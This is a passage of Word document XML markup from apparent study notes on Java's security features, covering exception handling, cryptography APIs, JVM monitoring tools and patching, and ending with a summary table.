          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, keeping internal logic safe from external interference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF5357E" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DE4CF6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="5F51C4CA">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5611E5E8" w14:textId="796DCCB8" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00C36B26">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Exception Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ADEBE6" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java's exception system helps handle runtime errors gracefully, reducing crashes or undefined behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF5E53B" w14:textId="1A71E578" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C36B26">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="5EF76128">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8. Built-in Cryptography &amp; SSL APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6367CD11" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java provides APIs for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>secure communication</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data encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like javax.crypto, java.security, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2032EDB4" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DE4CF6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="53572B53">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD5D4C7" w14:textId="3A8FA2FA" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00C36B26">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9. Runtime Monitoring with JVM Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250AD96" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java has profiling, monitoring, and diagnostic tools (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JFR</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JConsole</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VisualVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to catch issues early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C201E6C" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DE4CF6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="5225E94A">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="373BE14A" w14:textId="2526B13A" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00C36B26">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10. Regular Security Patches &amp; Community Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3E9560" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle and the OpenJDK community release </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequent security updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF52DE8" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vast community support ensures vulnerabilities are spotted and patched quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEF19A9" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DE4CF6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1373A96E">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B85650" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00DE4CF6">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66"/>
        <w:gridCol w:w="3853"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w14:paraId="01DD5D1E" w14:textId="77777777" w:rsidTr="00DE4CF6">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BD426CF" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00446908">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Security Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24E1B4AF" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00446908">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java's Advantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w14:paraId="43878081" w14:textId="77777777" w:rsidTr="00DE4CF6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2449FC93" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00DE4CF6">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Memory Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="456B617B" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00DE4CF6">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No pointers, GC prevents memory attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w14:paraId="009C89A3" w14:textId="77777777" w:rsidTr="00DE4CF6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4059A004" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00DE4CF6">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="495C9A69" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00DE4CF6">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Strong access modifiers and class isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w14:paraId="50BBB37C" w14:textId="77777777" w:rsidTr="00DE4CF6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1058DD60" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00DE4CF6">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Code Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C317754" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00DE4CF6">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Bytecode is checked before execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w14:paraId="766C756E" w14:textId="77777777" w:rsidTr="00DE4CF6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BE175A9" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00DE4CF6">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Runtime Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="236BB787" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00DE4CF6">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SecurityManager, ClassLoader protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w14:paraId="19C2E350" w14:textId="77777777" w:rsidTr="00DE4CF6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39E1F06D" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00DE4CF6">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Communication Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BD15BFE" w14:textId="77777777" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE4CF6" w:rsidP="00DE4CF6">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SSL, TLS, Encryption libraries available</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D429AF7" w14:textId="1C0ED7C4" w:rsidR="00DE4CF6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DE4CF6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
